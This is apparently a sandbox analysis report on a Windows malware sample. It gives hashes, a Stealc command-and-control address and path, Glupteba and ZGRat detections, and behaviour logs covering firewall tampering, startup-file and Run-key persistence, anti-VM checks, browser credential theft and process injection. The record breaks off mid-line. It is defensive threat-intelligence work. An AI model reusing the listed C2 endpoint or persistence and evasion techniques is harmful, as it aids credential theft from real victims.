Analysis
-
max time kernel
75s -
max time network
155s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
10-05-2024 18:31
Static task
static1
Behavioral task
behavioral1
Sample
716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe
Resource
win10v2004-20240426-en
General
-
Target
716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe
-
Size
2.7MB
-
MD5
d2f812118c89341715fbff0ba9530396
-
SHA1
8e9cfa2ebe51e9f71d55b161fb13aae13ee3744f
-
SHA256
716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d
-
SHA512
7a1884c5b2130db511f318103ece6ae1499c1e877e4dfc39d6c83b762febea258b5921fa72ae3b413ecfc752b571b2ce33f6fa1f680461d94fc3d2f1988d6c77
-
SSDEEP
24576:tRoBHi3buy4toE1jC6Ayo2xhWLbSPlqRvc68XzRVGvQB5VA0UC1dUUKj/LZ8j3gy:boKmo4jC6Tov2RUC1doj/wgy
Malware Config
Extracted
stealc
http://185.172.128.150
-
url_path
/c698e1bc8a2f5e6d.php
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral2/memory/404-713-0x000001977B2D0000-0x000001977EB04000-memory.dmp family_zgrat_v1 behavioral2/memory/404-714-0x000001971A350000-0x000001971A45A000-memory.dmp family_zgrat_v1 behavioral2/memory/404-718-0x000001971A4B0000-0x000001971A4D4000-memory.dmp family_zgrat_v1 -
Glupteba payload 18 IoCs
resource yara_rule behavioral2/memory/2472-83-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/2196-216-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/1596-219-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/3748-220-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/2472-221-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/3572-357-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/1360-358-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/4472-397-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/3112-398-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/3572-521-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/1360-523-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/4472-524-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/3112-526-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/1360-563-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/3112-568-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/3572-571-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/4472-576-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba behavioral2/memory/1344-666-0x0000000000400000-0x0000000002959000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" GiNvPlTouwEDWnHDe2tyvv48.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
pid Process 652 powershell.exe 2376 powershell.exe 3780 powershell.exe 5048 powershell.exe 32 powershell.exe 4928 powershell.exe 5100 powershell.exe 4432 powershell.exe 3644 powershell.exe 4964 powershell.exe 656 powershell.exe 5008 powershell.exe 2376 powershell.exe 2596 powershell.exe 1700 powershell.exe 3412 powershell.exe 3596 powershell.exe 4784 powershell.exe 4596 powershell.exe 2540 powershell.exe 4608 powershell.exe 4452 powershell.exe 2960 powershell.exe 3080 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 4092 netsh.exe 240 netsh.exe 724 netsh.exe 3640 netsh.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9OxFMiMQRBcxLVUGcvUEYXUI.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VJkAoTZ0Ugt19FGD5A3OCz8N.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CS9pjSqiWiPcXXCWrUucW0fQ.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z1vbG9ghsOdTqgkQoehQEJ1e.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZuDKFDvC2yyCvJHpFPispaMJ.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FmMEpb4TkJbYsxLWSx2IXfwQ.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evIHbwbY5FEYlyjugHAZUnMJ.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5zV99QPknH4cXVdPRXlGuSGp.bat AddInProcess32.exe -
Executes dropped EXE 14 IoCs
pid Process 1484 hiOas1GqV3z5zz7kPWQph9Lq.exe 1596 1mW5ZGPLevlx3PaKdYtAsBR0.exe 2196 NxQedFbABYqU9g52q4tgtpFC.exe 3748 ycZdOGVRwMfi9SFxM3Dxswkk.exe 2472 kb3gPGjo59wZD7K6fkvvOQ0u.exe 2248 x9gEJEXXOQq0VlTGAQEAyYDa.exe 1168 GiNvPlTouwEDWnHDe2tyvv48.exe 1944 u1qg.0.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 1360 NxQedFbABYqU9g52q4tgtpFC.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 4440 u1qg.1.exe 1344 csrss.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x001b00000002abb0-748.dat upx -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 1mW5ZGPLevlx3PaKdYtAsBR0.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" ycZdOGVRwMfi9SFxM3Dxswkk.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" kb3gPGjo59wZD7K6fkvvOQ0u.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" NxQedFbABYqU9g52q4tgtpFC.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 pastebin.com 2 pastebin.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 api.myip.com 28 ipinfo.io 34 api.myip.com 36 ipinfo.io -
Drops file in System32 directory 17 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy GiNvPlTouwEDWnHDe2tyvv48.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini GiNvPlTouwEDWnHDe2tyvv48.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol GiNvPlTouwEDWnHDe2tyvv48.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI GiNvPlTouwEDWnHDe2tyvv48.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3380 set thread context of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN kb3gPGjo59wZD7K6fkvvOQ0u.exe File opened (read-only) \??\VBoxMiniRdrDN 1mW5ZGPLevlx3PaKdYtAsBR0.exe File opened (read-only) \??\VBoxMiniRdrDN ycZdOGVRwMfi9SFxM3Dxswkk.exe File opened (read-only) \??\VBoxMiniRdrDN NxQedFbABYqU9g52q4tgtpFC.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe kb3gPGjo59wZD7K6fkvvOQ0u.exe File opened for modification C:\Windows\rss NxQedFbABYqU9g52q4tgtpFC.exe File created C:\Windows\rss\csrss.exe NxQedFbABYqU9g52q4tgtpFC.exe File opened for modification C:\Windows\rss 1mW5ZGPLevlx3PaKdYtAsBR0.exe File created C:\Windows\rss\csrss.exe 1mW5ZGPLevlx3PaKdYtAsBR0.exe File opened for modification C:\Windows\rss ycZdOGVRwMfi9SFxM3Dxswkk.exe File created C:\Windows\rss\csrss.exe ycZdOGVRwMfi9SFxM3Dxswkk.exe File opened for modification C:\Windows\rss kb3gPGjo59wZD7K6fkvvOQ0u.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4760 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3848 1484 WerFault.exe 84 2836 2248 WerFault.exe 89 2540 1944 WerFault.exe 103 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hiOas1GqV3z5zz7kPWQph9Lq.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hiOas1GqV3z5zz7kPWQph9Lq.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hiOas1GqV3z5zz7kPWQph9Lq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1qg.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1qg.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1qg.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1qg.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1qg.0.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1848 schtasks.exe 2780 schtasks.exe 1200 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" kb3gPGjo59wZD7K6fkvvOQ0u.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4432 powershell.exe 4432 powershell.exe 656 powershell.exe 656 powershell.exe 3596 powershell.exe 3596 powershell.exe 4784 powershell.exe 4784 powershell.exe 4432 powershell.exe 3596 powershell.exe 656 powershell.exe 4784 powershell.exe 2196 NxQedFbABYqU9g52q4tgtpFC.exe 2196 NxQedFbABYqU9g52q4tgtpFC.exe 2472 kb3gPGjo59wZD7K6fkvvOQ0u.exe 2472 kb3gPGjo59wZD7K6fkvvOQ0u.exe 3748 ycZdOGVRwMfi9SFxM3Dxswkk.exe 3748 ycZdOGVRwMfi9SFxM3Dxswkk.exe 1596 1mW5ZGPLevlx3PaKdYtAsBR0.exe 1596 1mW5ZGPLevlx3PaKdYtAsBR0.exe 1944 u1qg.0.exe 1944 u1qg.0.exe 5008 powershell.exe 5008 powershell.exe 2376 powershell.exe 2376 powershell.exe 5008 powershell.exe 3644 powershell.exe 3644 powershell.exe 2376 powershell.exe 3780 powershell.exe 3780 powershell.exe 3644 powershell.exe 3780 powershell.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 3572 kb3gPGjo59wZD7K6fkvvOQ0u.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 4472 1mW5ZGPLevlx3PaKdYtAsBR0.exe 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 1360 NxQedFbABYqU9g52q4tgtpFC.exe 1360 NxQedFbABYqU9g52q4tgtpFC.exe 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 1360 NxQedFbABYqU9g52q4tgtpFC.exe 1360 NxQedFbABYqU9g52q4tgtpFC.exe 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe 3112 ycZdOGVRwMfi9SFxM3Dxswkk.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 2664 AddInProcess32.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 656 powershell.exe Token: SeDebugPrivilege 4784 powershell.exe Token: SeDebugPrivilege 1596 1mW5ZGPLevlx3PaKdYtAsBR0.exe Token: SeDebugPrivilege 2196 NxQedFbABYqU9g52q4tgtpFC.exe Token: SeDebugPrivilege 2472 kb3gPGjo59wZD7K6fkvvOQ0u.exe Token: SeImpersonatePrivilege 2196 NxQedFbABYqU9g52q4tgtpFC.exe Token: SeImpersonatePrivilege 2472 kb3gPGjo59wZD7K6fkvvOQ0u.exe Token: SeDebugPrivilege 3748 ycZdOGVRwMfi9SFxM3Dxswkk.exe Token: SeImpersonatePrivilege 3748 ycZdOGVRwMfi9SFxM3Dxswkk.exe Token: SeImpersonatePrivilege 1596 1mW5ZGPLevlx3PaKdYtAsBR0.exe Token: SeDebugPrivilege 5008 powershell.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 2376 powershell.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe 4440 u1qg.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3380 wrote to memory of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 PID 3380 wrote to memory of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 PID 3380 wrote to memory of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 PID 3380 wrote to memory of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 PID 3380 wrote to memory of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 PID 3380 wrote to memory of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 PID 3380 wrote to memory of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 PID 3380 wrote to memory of 2664 3380 716741d85859c7c4747395deb709dc0b4b2741a0d15850aa3a706cc05d61bf6d.exe 81 PID 2664 wrote to memory of 1484 2664 AddInProcess32.exe 84 PID 2664 wrote to memory of 1484 2664 AddInProcess32.exe 84 PID 2664 wrote to memory of 1484 2664 AddInProcess32.exe 84 PID 2664 wrote to memory of 1596 2664 AddInProcess32.exe 85 PID 2664 wrote to memory of 1596 2664 AddInProcess32.exe 85 PID 2664 wrote to memory of 1596 2664 AddInProcess32.exe 85 PID 2664 wrote to memory of 2196 2664 AddInProcess32.exe 86 PID 2664 wrote to memory of 2196 2664 AddInProcess32.exe 86 PID 2664 wrote to memory of 2196 2664 AddInProcess32.exe 86 PID 2664 wrote to memory of 3748 2664 AddInProcess32.exe 87 PID 2664 wrote to memory of 3748 2664 AddInProcess32.exe 87 PID 2664 wrote to memory of 3748 2664 AddInProcess32.exe 87 PID 2664 wrote to memory of 2472 2664 AddInProcess32.exe 88 PID 2664 wrote 